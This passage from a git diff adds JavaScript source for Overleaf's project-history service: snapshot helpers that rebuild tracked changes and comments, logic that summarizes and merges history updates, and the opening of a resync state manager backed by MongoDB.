+ * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + * @returns {Promise<RangesSnapshot>} + */ +async function getRangesSnapshot(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const file = snapshot.getFile(pathname) + if (!file) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + if (!file.isEditable()) { + // A binary file has no tracked changes or comments + return { + changes: [], + comments: [], + } + } + const historyId = await WebApiManager.promises.getHistoryId(projectId) + await file.load('eager', HistoryStoreManager.getBlobStore(historyId)) + const content = file.getContent() + if (content == null) { + throw new Error('Unable to read file contents') + } + const trackedChanges = file.getTrackedChanges().asSorted() + const comments = file.getComments().toArray() + const docUpdaterCompatibleTrackedChanges = [] + + let trackedDeletionOffset = 0 + for (const trackedChange of trackedChanges) { + const isTrackedDeletion = trackedChange.tracking.type === 'delete' + const trackedChangeContent = content.slice( + trackedChange.range.start, + trackedChange.range.end + ) + const tcContent = isTrackedDeletion + ? { d: trackedChangeContent } + : { i: trackedChangeContent } + docUpdaterCompatibleTrackedChanges.push({ + op: { + p: trackedChange.range.start - trackedDeletionOffset, + ...tcContent, + }, + metadata: { + ts: trackedChange.tracking.ts.toISOString(), + user_id: trackedChange.tracking.userId, + }, + }) + if (isTrackedDeletion) { + trackedDeletionOffset += trackedChange.range.length + } + } + + // Comments are shifted left by the length of any previous tracked deletions. + // If they overlap with a tracked deletion, they are truncated. 
+ // + // Example: + // { } comment + // [ ] tracked deletion + // the quic[k {b]rown [fox] jum[ps} ove]r the lazy dog + // => rown jum + // starting at position 8 + const trackedDeletions = trackedChanges.filter( + tc => tc.tracking.type === 'delete' + ) + const docUpdaterCompatibleComments = [] + for (const comment of comments) { + let trackedDeletionIndex = 0 + if (comment.ranges.length === 0) { + // Translate detached comments into zero length comments at position 0 + docUpdaterCompatibleComments.push({ + op: { + p: 0, + c: '', + t: comment.id, + resolved: comment.resolved, + }, + }) + continue + } + + // Consider a multiple range comment as a single comment that joins all its + // ranges + const commentStart = comment.ranges[0].start + const commentEnd = comment.ranges[comment.ranges.length - 1].end + + let commentContent = '' + // Docupdater position + let position = commentStart + while (trackedDeletions[trackedDeletionIndex]?.range.end <= commentStart) { + // Skip over tracked deletions that are before the current comment range + position -= trackedDeletions[trackedDeletionIndex].range.length + trackedDeletionIndex++ + } + + if (trackedDeletions[trackedDeletionIndex]?.range.start < commentStart) { + // There's overlap with a tracked deletion, move the position left and + // truncate the overlap + position -= + commentStart - trackedDeletions[trackedDeletionIndex].range.start + } + + // Cursor in the history content + let cursor = commentStart + while (cursor < commentEnd) { + const trackedDeletion = trackedDeletions[trackedDeletionIndex] + if (!trackedDeletion || trackedDeletion.range.start >= commentEnd) { + // We've run out of relevant tracked changes + commentContent += content.slice(cursor, commentEnd) + break + } + if (trackedDeletion.range.start > cursor) { + // There's a gap between the current cursor and the tracked deletion + commentContent += content.slice(cursor, trackedDeletion.range.start) + } + + if (trackedDeletion.range.end <= commentEnd) { + // Skip to the end of the tracked delete + cursor = trackedDeletion.range.end + trackedDeletionIndex++ + } else { + // We're done with that comment + break + } + } + docUpdaterCompatibleComments.push({ + op: { + p: position, + c: commentContent, + t: comment.id, + resolved: comment.resolved, + }, + id: comment.id, + }) + } + + return { + changes: docUpdaterCompatibleTrackedChanges, + comments: docUpdaterCompatibleComments, + } +} + +/** + * Gets the file metadata at a specific version. + * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + * @returns {Promise<{metadata: any}>} + */ +async function getFileMetadataSnapshot(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const file = snapshot.getFile(pathname) + if (!file) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + const rawMetadata = file.getMetadata() + const metadata = _.isEmpty(rawMetadata) ? undefined : rawMetadata + + return { metadata } +} + +// Returns project snapshot containing the document content for files with +// text operations in the relevant chunk, and hashes for unmodified/binary +// files. Used by git bridge to get the state of the project. 
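+//
+// Illustrative return shape (assumed from the mapping below; pathnames and
+// hash are made up):
+//   { projectId: '...',
+//     files: {
+//       'main.tex': { data: { content: '\\documentclass{article}...' } },
+//       'figure.png': { data: { hash: 'f2a1...' } },
+//     } }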
+async function getProjectSnapshot(projectId, version) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const historyId = await WebApiManager.promises.getHistoryId(projectId) + await _loadFilesLimit( + snapshot, + 'eager', + HistoryStoreManager.getBlobStore(historyId) + ) + return { + projectId, + files: snapshot.getFileMap().map(file => { + if (!file) { + return null + } + const content = file.getContent({ + filterTrackedDeletes: true, + }) + if (content === null) { + return { data: { hash: file.getHash() } } + } + return { data: { content } } + }), + } +} + +async function getPathsAtVersion(projectId, version) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + return { + paths: snapshot.getFilePathnames(), + } +} + +/** + * + * @param {string} projectId + * @param {number} version + */ +async function _getSnapshotAtVersion(projectId, version) { + const historyId = await WebApiManager.promises.getHistoryId(projectId) + const data = await HistoryStoreManager.promises.getChunkAtVersion( + projectId, + historyId, + version + ) + const chunk = Core.Chunk.fromRaw(data.chunk) + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges().slice(0, version - chunk.getStartVersion()) + snapshot.applyAll(changes) + return snapshot +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<Record<string, import('overleaf-editor-core').File>>} + */ +async function getLatestSnapshotFiles(projectId, historyId) { + const data = await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + return await getLatestSnapshotFilesForChunk(historyId, data) +} + +/** + * @param {string} historyId + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} chunk + * @return {Promise<Record<string, import('overleaf-editor-core').File>>} + */ +async function getLatestSnapshotFilesForChunk(historyId, chunk) { + const { snapshot } = getLatestSnapshotFromChunk(chunk) + const snapshotFiles = await snapshot.loadFiles( + 'lazy', + HistoryStoreManager.getBlobStore(historyId) + ) + return snapshotFiles +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<{version: number, snapshot: import('overleaf-editor-core').Snapshot}>} + */ +async function getLatestSnapshot(projectId, historyId) { + const data = await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + return getLatestSnapshotFromChunk(data) +} + +/** + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} data + * @return {{version: number, snapshot: import('overleaf-editor-core').Snapshot}} + */ +function getLatestSnapshotFromChunk(data) { + if (data == null || data.chunk == null) { + throw new OError('undefined chunk') + } + + // apply all the changes in the chunk to get the current snapshot + const chunk = Core.Chunk.fromRaw(data.chunk) + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + return { + snapshot, + version: chunk.getEndVersion(), + } +} + +async function getChangesInChunkSince(projectId, historyId, sinceVersion) { + const latestChunk = Core.Chunk.fromRaw( + ( + await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + ).chunk + ) + if (sinceVersion > latestChunk.getEndVersion()) { + throw new Errors.BadRequestError( + 'requested version past the end of the history' + ) + } + const latestStartVersion = latestChunk.getStartVersion() + let chunk = latestChunk + if 
(sinceVersion < latestStartVersion) { + chunk = Core.Chunk.fromRaw( + ( + await HistoryStoreManager.promises.getChunkAtVersion( + projectId, + historyId, + sinceVersion + ) + ).chunk + ) + } + const changes = chunk + .getChanges() + .slice(sinceVersion - chunk.getStartVersion()) + return { latestStartVersion, changes } +} + +async function _loadFilesLimit(snapshot, kind, blobStore) { + await snapshot.fileMap.mapAsync(async file => { + // only load changed files or files with tracked changes, others can be + // dereferenced from their blobs (this method is only used by the git + // bridge which understands how to load blobs). + if (!file.isEditable() || (file.getHash() && !file.getRangesHash())) { + return + } + await file.load(kind, blobStore) + }, MAX_REQUESTS) +} + +// EXPORTS + +const getChangesInChunkSinceCb = callbackify(getChangesInChunkSince) +const getFileSnapshotStreamCb = callbackify(getFileSnapshotStream) +const getProjectSnapshotCb = callbackify(getProjectSnapshot) +const getLatestSnapshotCb = callbackify(getLatestSnapshot) +const getLatestSnapshotFilesCb = callbackify(getLatestSnapshotFiles) +const getLatestSnapshotFilesForChunkCb = callbackify( + getLatestSnapshotFilesForChunk +) +const getRangesSnapshotCb = callbackify(getRangesSnapshot) +const getFileMetadataSnapshotCb = callbackify(getFileMetadataSnapshot) +const getPathsAtVersionCb = callbackify(getPathsAtVersion) + +export { + getLatestSnapshotFromChunk, + getChangesInChunkSinceCb as getChangesInChunkSince, + getFileSnapshotStreamCb as getFileSnapshotStream, + getProjectSnapshotCb as getProjectSnapshot, + getFileMetadataSnapshotCb as getFileMetadataSnapshot, + getLatestSnapshotCb as getLatestSnapshot, + getLatestSnapshotFilesCb as getLatestSnapshotFiles, + getLatestSnapshotFilesForChunkCb as getLatestSnapshotFilesForChunk, + getRangesSnapshotCb as getRangesSnapshot, + getPathsAtVersionCb as getPathsAtVersion, +} + +export const promises = { + getChangesInChunkSince, + getFileSnapshotStream, + getProjectSnapshot, + getLatestSnapshot, + getLatestSnapshotFiles, + getLatestSnapshotFilesForChunk, + getRangesSnapshot, + getPathsAtVersion, + getFileMetadataSnapshot, +} diff --git a/services/project-history/app/js/SummarizedUpdatesManager.js b/services/project-history/app/js/SummarizedUpdatesManager.js new file mode 100644 index 0000000..a96c16e --- /dev/null +++ b/services/project-history/app/js/SummarizedUpdatesManager.js @@ -0,0 +1,354 @@ +import _ from 'lodash' +import async from 'async' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as ChunkTranslator from './ChunkTranslator.js' +import * as HistoryApiManager from './HistoryApiManager.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as LabelsManager from './LabelsManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as WebApiManager from './WebApiManager.js' + +const MAX_CHUNK_REQUESTS = 5 +const TIME_BETWEEN_DISTINCT_UPDATES = 5 * 60 * 1000 // five minutes + +export function getSummarizedProjectUpdates(projectId, options, callback) { + // Some notes on versions: + // + // Versions of the project are like the fenceposts between updates. + // An update applies to a certain version of the project, and gives us the + // next version. + // + // When we ask for updates 'before' a version, this includes the update + // that created the version equal to 'before'. 
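+  //
+  // For example (illustrative): updates u1, u2, u3 take a project through
+  // versions 0 -> 1 -> 2 -> 3. Asking for updates 'before' version 2
+  // returns u1 and u2, because u2 is the update that created version 2.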
+ // + // A chunk in OL has a 'startVersion', which is the version of the project + // before any of the updates in it were applied. This is the same version as + // the last update in the previous chunk would have created. + // + // If we ask the OL history store for the chunk with version that is the end of one + // chunk and the start of another, it will return the older chunk, i.e. + // the chunk with the updates that led up to that version. + // + // So once we read in the updates from a chunk, and want to get the updates from + // the previous chunk, we ask OL for the chunk with the version equal to the + // 'startVersion' of the newer chunk we just read. + + let nextVersionToRequest + if (options == null) { + options = {} + } + if (!options.min_count) { + options.min_count = 25 + } + if (options.before != null) { + // The version is of the doc, so we want the updates before that version, + // which includes the update that created that version. + nextVersionToRequest = options.before + } else { + // Return the latest updates first if no nextVersionToRequest is set. + nextVersionToRequest = null + } + + UpdatesProcessor.processUpdatesForProject(projectId, function (error) { + if (error) { + return callback(OError.tag(error)) + } + LabelsManager.getLabels(projectId, function (error, labels) { + if (error) { + return callback(OError.tag(error)) + } + + const labelsByVersion = {} + for (const label of labels) { + if (labelsByVersion[label.version] == null) { + labelsByVersion[label.version] = [] + } + labelsByVersion[label.version].push(label) + } + + WebApiManager.getHistoryId(projectId, function (error, historyId) { + if (error) return callback(error) + let chunksRequested = 0 + let summarizedUpdates = [] + let toV = null + + const shouldRequestMoreUpdates = cb => { + return cb( + null, + chunksRequested < MAX_CHUNK_REQUESTS && + (nextVersionToRequest == null || nextVersionToRequest > 0) && + summarizedUpdates.length < options.min_count + ) + } + + const getNextBatchOfUpdates = cb => + _getProjectUpdates( + projectId, + historyId, + nextVersionToRequest, + function (error, updateSet, startVersion) { + if (error) { + return cb(OError.tag(error)) + } + // Updates are returned in time order, but we want to go back in time + updateSet.reverse() + updateSet = discardUnwantedUpdates(updateSet) + ;({ summarizedUpdates, toV } = _summarizeUpdates( + updateSet, + labelsByVersion, + summarizedUpdates, + toV + )) + nextVersionToRequest = startVersion + chunksRequested += 1 + cb() + } + ) + + function discardUnwantedUpdates(updateSet) { + // We're getting whole chunks from the OL history store, but we might + // only want updates from before a certain version + if (options.before == null) { + return updateSet + } else { + return updateSet.filter(u => u.v < options.before) + } + } + + // If the project doesn't have a history then we can bail out here + HistoryApiManager.shouldUseProjectHistory( + projectId, + function (error, shouldUseProjectHistory) { + if (error) { + return callback(OError.tag(error)) + } + if (shouldUseProjectHistory) { + async.whilst( + shouldRequestMoreUpdates, + getNextBatchOfUpdates, + function (error) { + if (error) { + return callback(OError.tag(error)) + } + callback( + null, + summarizedUpdates, + nextVersionToRequest > 0 ? 
nextVersionToRequest : undefined + ) + } + ) + } else { + logger.debug( + { projectId }, + 'returning no updates as project does not use history' + ) + callback(null, []) + } + } + ) + }) + }) + }) +} + +function _getProjectUpdates(projectId, historyId, version, callback) { + function getChunk(cb) { + if (version != null) { + HistoryStoreManager.getChunkAtVersion(projectId, historyId, version, cb) + } else { + HistoryStoreManager.getMostRecentChunk(projectId, historyId, cb) + } + } + + getChunk(function (error, chunk) { + if (error) { + return callback(OError.tag(error)) + } + const oldestVersion = chunk.chunk.startVersion + ChunkTranslator.convertToSummarizedUpdates( + chunk, + function (error, updateSet) { + if (error) { + return callback(OError.tag(error)) + } + callback(error, updateSet, oldestVersion) + } + ) + }) +} + +function _summarizeUpdates(updates, labels, existingSummarizedUpdates, toV) { + if (existingSummarizedUpdates == null) { + existingSummarizedUpdates = [] + } + const summarizedUpdates = existingSummarizedUpdates.slice() + for (const update of updates) { + if (toV == null) { + // This is the first update we've seen. Initialize toV. + toV = update.v + 1 + } + + // Skip empty updates (only record their version). Empty updates are + // updates that only contain comment operations. We don't have a UI for + // these yet. + if (isUpdateEmpty(update)) { + continue + } + + // The client needs to know the exact version that a delete happened, in order + // to be able to restore. So even when summarizing, retain the version that each + // projectOp happened at. + for (const projectOp of update.project_ops) { + projectOp.atV = update.v + } + + const summarizedUpdate = summarizedUpdates[summarizedUpdates.length - 1] + const labelsForVersion = labels[update.v + 1] || [] + if ( + summarizedUpdate && + _shouldMergeUpdate(update, summarizedUpdate, labelsForVersion) + ) { + _mergeUpdate(update, summarizedUpdate) + } else { + const newUpdate = { + fromV: update.v, + toV, + meta: { + users: update.meta.users, + start_ts: update.meta.start_ts, + end_ts: update.meta.end_ts, + }, + labels: labelsForVersion, + pathnames: new Set(update.pathnames), + project_ops: update.project_ops.slice(), // Clone since we'll modify + } + if (update.meta.origin) { + newUpdate.meta.origin = update.meta.origin + } + + summarizedUpdates.push(newUpdate) + } + toV = update.v + } + + return { summarizedUpdates, toV } +} + +/** + * Given an update, the latest summarized update, and the labels that apply to + * the update, figure out if we can merge the update into the summarized + * update. + */ +function _shouldMergeUpdate(update, summarizedUpdate, labels) { + // Split updates on labels + if (labels.length > 0) { + return false + } + + // Split updates on origin + if (update.meta.origin) { + if (summarizedUpdate.meta.origin) { + if (update.meta.origin.kind !== summarizedUpdate.meta.origin.kind) { + return false + } + if (update.meta.origin.path !== summarizedUpdate.meta.origin.path) { + return false + } + if ( + update.meta.origin.kind === 'file-restore' && + update.meta.origin.timestamp !== summarizedUpdate.meta.origin.timestamp + ) { + return false + } + if ( + update.meta.origin.kind === 'project-restore' && + update.meta.origin.timestamp !== summarizedUpdate.meta.origin.timestamp + ) { + return false + } + } else { + return false + } + } else if (summarizedUpdate.meta.origin) { + return false + } + + // Split updates if it's been too long since the last update. 
We're going + // backwards in time through the updates, so the update comes before the summarized update. + if ( + summarizedUpdate.meta.end_ts - update.meta.start_ts >= + TIME_BETWEEN_DISTINCT_UPDATES + ) { + return false + } + + // Do not merge text operations and file operations, except for history resyncs + const updateHasTextOps = update.pathnames.length > 0 + const updateHasFileOps = update.project_ops.length > 0 + const summarizedUpdateHasTextOps = summarizedUpdate.pathnames.size > 0 + const summarizedUpdateHasFileOps = summarizedUpdate.project_ops.length > 0 + const isHistoryResync = + update.meta.origin && + ['history-resync', 'history-migration'].includes(update.meta.origin.kind) + if ( + !isHistoryResync && + ((updateHasTextOps && summarizedUpdateHasFileOps) || + (updateHasFileOps && summarizedUpdateHasTextOps)) + ) { + return false + } + + return true +} + +/** + * Merge an update into a summarized update. + * + * This mutates the summarized update. + */ +function _mergeUpdate(update, summarizedUpdate) { + // check if the user in this update is already present in the earliest update, + // if not, add them to the users list of the earliest update + summarizedUpdate.meta.users = _.uniqBy( + _.union(summarizedUpdate.meta.users, update.meta.users), + function (user) { + if (user == null) { + return null + } + if (user.id == null) { + return user + } + return user.id + } + ) + + summarizedUpdate.fromV = Math.min(summarizedUpdate.fromV, update.v) + summarizedUpdate.toV = Math.max(summarizedUpdate.toV, update.v + 1) + summarizedUpdate.meta.start_ts = Math.min( + summarizedUpdate.meta.start_ts, + update.meta.start_ts + ) + summarizedUpdate.meta.end_ts = Math.max( + summarizedUpdate.meta.end_ts, + update.meta.end_ts + ) + + // Add file operations + for (const op of update.project_ops || []) { + summarizedUpdate.project_ops.push(op) + if (op.add) { + // Merging a file creation. Remove any corresponding edit since that's redundant. 
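+      // (Illustrative: summarizing runs backwards in time, so if later edits
+      // already added 'main.tex' to `pathnames` and we now merge the update
+      // that created 'main.tex', the add op carries the full content and the
+      // stale edit entry can be dropped.)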
+      summarizedUpdate.pathnames.delete(op.add.pathname)
+    }
+  }
+
+  // Add edit operations
+  for (const pathname of update.pathnames || []) {
+    summarizedUpdate.pathnames.add(pathname)
+  }
+}
+
+function isUpdateEmpty(update) {
+  return update.project_ops.length === 0 && update.pathnames.length === 0
+}
diff --git a/services/project-history/app/js/SyncManager.js b/services/project-history/app/js/SyncManager.js
new file mode 100644
index 0000000..ef8caf6
--- /dev/null
+++ b/services/project-history/app/js/SyncManager.js
@@ -0,0 +1,1219 @@
+// @ts-check
+
+import _ from 'lodash'
+import { callbackify, promisify } from 'node:util'
+import { callbackifyMultiResult } from '@overleaf/promise-utils'
+import Settings from '@overleaf/settings'
+import logger from '@overleaf/logger'
+import Metrics from '@overleaf/metrics'
+import OError from '@overleaf/o-error'
+import { File, Range } from 'overleaf-editor-core'
+import { NeedFullProjectStructureResyncError, SyncError } from './Errors.js'
+import { db, ObjectId } from './mongodb.js'
+import * as SnapshotManager from './SnapshotManager.js'
+import * as LockManager from './LockManager.js'
+import * as UpdateTranslator from './UpdateTranslator.js'
+import * as UpdateCompressor from './UpdateCompressor.js'
+import * as WebApiManager from './WebApiManager.js'
+import * as ErrorRecorder from './ErrorRecorder.js'
+import * as RedisManager from './RedisManager.js'
+import * as HistoryStoreManager from './HistoryStoreManager.js'
+import * as HashManager from './HashManager.js'
+import { isInsert, isDelete } from './Utils.js'
+
+/**
+ * @import { Comment as HistoryComment, TrackedChange as HistoryTrackedChange } from 'overleaf-editor-core'
+ * @import { Comment, Entity, ResyncDocContentUpdate, RetainOp, TrackedChange } from './types'
+ * @import { TrackedChangeTransition, TrackingDirective, TrackingType, Update } from './types'
+ * @import { ProjectStructureUpdate } from './types'
+ */
+const MAX_RESYNC_HISTORY_RECORDS = 100 // keep this many records of previous resyncs
+const EXPIRE_RESYNC_HISTORY_INTERVAL_MS = 90 * 24 * 3600 * 1000 // 90 days
+
+const keys = Settings.redis.lock.key_schema
+
+// db.projectHistorySyncState.ensureIndex({expiresAt: 1}, {expireAfterSeconds: 0, background: true})
+// To add expiresAt field to existing entries in collection (choose a suitable future expiry date):
+// db.projectHistorySyncState.updateMany({resyncProjectStructure: false, resyncDocContents: [], expiresAt: {$exists:false}}, {$set: {expiresAt: new Date("2019-07-01")}})
+
+async function startResync(projectId, options = {}) {
+  // We have three options here
+  //
+  // 1. If we update mongo before making the call to web then there's a
+  //    chance we ignore all updates indefinitely (there's no foolproof way
+  //    to undo the change in mongo)
+  //
+  // 2. If we make the call to web first then there is a small race condition
+  //    where we could process the sync update and then only update mongo
+  //    after, causing all updates to be ignored from then on
+  //
+  // 3.
We can wrap everything in a project lock + Metrics.inc('project_history_resync') + try { + await LockManager.promises.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + async extendLock => { + await startResyncWithoutLock(projectId, options) + } + ) + } catch (error) { + // record error in starting sync ("sync ongoing") + if (error instanceof Error) { + await ErrorRecorder.promises.record(projectId, -1, error) + } + throw error + } +} + +async function startHardResync(projectId, options = {}) { + Metrics.inc('project_history_hard_resync') + try { + await LockManager.promises.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + async extendLock => { + await clearResyncState(projectId) + await RedisManager.promises.clearFirstOpTimestamp(projectId) + await RedisManager.promises.destroyDocUpdatesQueue(projectId) + await startResyncWithoutLock(projectId, options) + } + ) + } catch (error) { + // record error in starting sync ("sync ongoing") + if (error instanceof Error) { + await ErrorRecorder.promises.record(projectId, -1, error) + } + throw error + } +} + +// The caller must hold the lock and should record any errors via the ErrorRecorder. +async function startResyncWithoutLock(projectId, options) { + await ErrorRecorder.promises.recordSyncStart(projectId) + + const syncState = await _getResyncState(projectId) + if (syncState.isSyncOngoing()) { + throw new OError('sync ongoing') + } + syncState.setOrigin(options.origin || { kind: 'history-resync' }) + syncState.startProjectStructureSync() + + const webOpts = {} + if (options.historyRangesMigration) { + webOpts.historyRangesMigration = options.historyRangesMigration + } + if (options.resyncProjectStructureOnly) { + webOpts.resyncProjectStructureOnly = options.resyncProjectStructureOnly + } + await WebApiManager.promises.requestResync(projectId, webOpts) + await setResyncState(projectId, syncState) +} + +async function _getResyncState(projectId) { + const rawSyncState = await db.projectHistorySyncState.findOne({ + project_id: new ObjectId(projectId.toString()), + }) + const syncState = SyncState.fromRaw(projectId, rawSyncState) + return syncState +} + +async function setResyncState(projectId, syncState) { + // skip if syncState is null (i.e. 
unchanged)
+  if (syncState == null) {
+    return
+  }
+  const update = {
+    $set: syncState.toRaw(),
+    $push: {
+      history: {
+        $each: [{ syncState: syncState.toRaw(), timestamp: new Date() }],
+        $position: 0,
+        $slice: MAX_RESYNC_HISTORY_RECORDS,
+      },
+    },
+    $currentDate: { lastUpdated: true },
+  }
+
+  // handle different cases
+  if (syncState.isSyncOngoing()) {
+    // starting a new sync; prevent the entry from expiring while the sync is ongoing
+    update.$inc = { resyncCount: 1 }
+    update.$unset = { expiresAt: true }
+  } else {
+    // successful completion of existing sync; set the entry to expire in the
+    // future
+    update.$set.expiresAt = new Date(
+      Date.now() + EXPIRE_RESYNC_HISTORY_INTERVAL_MS
+    )
+  }
+
+  // apply the update
+  await db.projectHistorySyncState.updateOne(
+    { project_id: new ObjectId(projectId) },
+    update,
+    { upsert: true }
+  )
+}
+
+async function clearResyncState(projectId) {
+  await db.projectHistorySyncState.deleteOne({
+    project_id: new ObjectId(projectId.toString()),
+  })
+}
+
+/**
+ * @param {string} projectId
+ * @param {Date} date
+ * @return {Promise<void>}
+ */
+async function clearResyncStateIfAllAfter(projectId, date) {
+  const rawSyncState = await db.projectHistorySyncState.findOne({
+    project_id: new ObjectId(projectId.toString()),
+  })
+  if (!rawSyncState) return // already cleared
+  const state = SyncState.fromRaw(projectId, rawSyncState)
+  if (state.isSyncOngoing()) return // new sync started
+  for (const { timestamp } of rawSyncState.history) {
+    if (timestamp < date) return // preserve old resync states
+  }
+  // expiresAt is cleared when starting a sync and bumped when making changes.
+  // Use expiresAt as read to ensure we only clear the confirmed state.
+  await db.projectHistorySyncState.deleteOne({
+    project_id: new ObjectId(projectId.toString()),
+    expiresAt: rawSyncState.expiresAt,
+  })
+}
+
+async function skipUpdatesDuringSync(projectId, updates) {
+  const syncState = await _getResyncState(projectId)
+  if (!syncState.isSyncOngoing()) {
+    logger.debug({ projectId }, 'not skipping updates: no resync in progress')
+    // don't return syncState when unchanged
+    return { updates, syncState: null }
+  }
+
+  const filteredUpdates = []
+
+  for (const update of updates) {
+    syncState.updateState(update)
+    const shouldSkipUpdate = syncState.shouldSkipUpdate(update)
+    if (!shouldSkipUpdate) {
+      filteredUpdates.push(update)
+    } else {
+      logger.debug({ projectId, update }, 'skipping update due to resync')
+    }
+  }
+  return { updates: filteredUpdates, syncState }
+}
+
+/**
+ * @param {string} projectId
+ * @param {string} projectHistoryId
+ * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} mostRecentChunk
+ * @param {Array<Update>} updates
+ * @param {() => Promise<void>} extendLock
+ * @return {Promise<Array<Update>>}
+ */
+async function expandSyncUpdates(
+  projectId,
+  projectHistoryId,
+  mostRecentChunk,
+  updates,
+  extendLock
+) {
+  const areSyncUpdatesQueued =
+    _.some(updates, 'resyncProjectStructure') ||
+    _.some(updates, 'resyncDocContent')
+  if (!areSyncUpdatesQueued) {
+    logger.debug({ projectId }, 'no resync updates to expand')
+    return updates
+  }
+
+  const syncState = await _getResyncState(projectId)
+
+  // compute the current snapshot from the most recent chunk
+  const snapshotFiles =
+    await SnapshotManager.promises.getLatestSnapshotFilesForChunk(
+      projectHistoryId,
+      mostRecentChunk
+    )
+
+  // check if snapshot files are valid
+  const invalidFiles = _.pickBy(
+    snapshotFiles,
+    (v, k) => v == null || typeof v.isEditable !== 'function'
+  )
+  if (_.size(invalidFiles) > 0) {
+    throw new SyncError('file is missing isEditable method', {
+      projectId,
+      invalidFiles,
+    })
+  }
+
+  const expander = new SyncUpdateExpander(
+    projectId,
+    snapshotFiles,
+    syncState.origin
+  )
+
+  // expand updates asynchronously to avoid blocking
+  for (const update of updates) {
+    await expander.expandUpdate(update)
+    await extendLock()
+  }
+
+  return expander.getExpandedUpdates()
+}
+
+class SyncState {
+  constructor(projectId, resyncProjectStructure, resyncDocContents, origin) {
+    this.projectId = projectId
+    this.resyncProjectStructure = resyncProjectStructure
+    this.resyncDocContents = resyncDocContents
+    this.origin = origin
+  }
+
+  static fromRaw(projectId, rawSyncState) {
+    rawSyncState = rawSyncState || {}
+    const resyncProjectStructure = rawSyncState.resyncProjectStructure || false
+    const resyncDocContents = new Set(rawSyncState.resyncDocContents || [])
+    const origin = rawSyncState.origin
+    return new SyncState(
+      projectId,
+      resyncProjectStructure,
+      resyncDocContents,
+      origin
+    )
+  }
+
+  toRaw() {
+    return {
+      resyncProjectStructure: this.resyncProjectStructure,
+      resyncDocContents: Array.from(this.resyncDocContents),
+      origin: this.origin,
+    }
+  }
+
+  updateState(update) {
+    if (update.resyncProjectStructure != null) {
+      if (!this.isProjectStructureSyncing()) {
+        throw new SyncError('unexpected resyncProjectStructure update', {
+          projectId: this.projectId,
+          resyncProjectStructure: this.resyncProjectStructure,
+        })
+      }
+      if (this.isAnyDocContentSyncing()) {
+        throw new SyncError('unexpected resyncDocContents update', {
+          projectId: this.projectId,
+          resyncDocContents: this.resyncDocContents,
+        })
+      }
+
+      if (!update.resyncProjectStructureOnly) {
+        for (const doc of update.resyncProjectStructure.docs) {
+          this.startDocContentSync(doc.path)
+        }
+      }
+
+      this.stopProjectStructureSync()
+    } else if (update.resyncDocContent != null) {
+      if (this.isProjectStructureSyncing()) {
+        throw new SyncError('unexpected resyncDocContent update', {
+          projectId: this.projectId,
+          resyncProjectStructure: this.resyncProjectStructure,
+        })
+      }
+
+      if (!this.isDocContentSyncing(update.path)) {
+        throw new SyncError('unexpected resyncDocContent update', {
+          projectId: this.projectId,
+          resyncDocContents: this.resyncDocContents,
+          path: update.path,
+        })
+      }
+
+      this.stopDocContentSync(update.path)
+    }
+  }
+
+  setOrigin(origin) {
+    this.origin = origin
+  }
+
+  shouldSkipUpdate(update) {
+    // don't skip sync updates
+    if (
+      update.resyncProjectStructure != null ||
+      update.resyncDocContent != null
+    ) {
+      return false
+    }
+
+    // if syncing project structure, skip the update
+    if (this.isProjectStructureSyncing()) {
+      return true
+    }
+
+    // skip text updates for docs being synced
+    if (UpdateTranslator.isTextUpdate(update)) {
+      if (this.isDocContentSyncing(update.meta.pathname)) {
+        return true
+      }
+    }
+
+    // preserve all other updates
+    return false
+  }
+
+  startProjectStructureSync() {
+    this.resyncProjectStructure = true
+    this.resyncDocContents = new Set([])
+  }
+
+  stopProjectStructureSync() {
+    this.resyncProjectStructure = false
+  }
+
+  stopDocContentSync(pathname) {
+    this.resyncDocContents.delete(pathname)
+  }
+
+  startDocContentSync(pathname) {
+    this.resyncDocContents.add(pathname)
+  }
+
+  isProjectStructureSyncing() {
+    return this.resyncProjectStructure
+  }
+
+  isDocContentSyncing(pathname) {
+    return this.resyncDocContents.has(pathname)
+  }
+
+  isAnyDocContentSyncing() {
+    return this.resyncDocContents.size > 0
+  }
+
+  isSyncOngoing()
{ + return this.isProjectStructureSyncing() || this.isAnyDocContentSyncing() + } +} + +class SyncUpdateExpander { + /** + * Build a SyncUpdateExpander + * + * @param {string} projectId + * @param {Record<string, File>} snapshotFiles + * @param {string} origin + */ + constructor(projectId, snapshotFiles, origin) { + this.projectId = projectId + this.files = snapshotFiles + this.expandedUpdates = /** @type ProjectStructureUpdate[] */ [] + this.origin = origin + } + + // If there's an expected *file* with the same path and either the same hash + // or no hash, treat this as not editable even if history thinks it is. + isEditable(filePath, file, expectedFiles) { + if (!file.isEditable()) { + return false + } + const fileHash = _.get(file, ['data', 'hash']) + const matchedExpectedFile = expectedFiles.some(item => { + const expectedFileHash = item._hash + if (expectedFileHash && fileHash !== expectedFileHash) { + // expected file has a hash and it doesn't match + return false + } + return UpdateTranslator._convertPathname(item.path) === filePath + }) + + // consider editable file in history as binary, since it matches a binary file in the project + return !matchedExpectedFile + } + + /** + * @param {Update} update + */ + async expandUpdate(update) { + if ('resyncProjectStructure' in update) { + logger.debug( + { projectId: this.projectId, update }, + 'expanding resyncProjectStructure update' + ) + const persistedNonBinaryFileEntries = 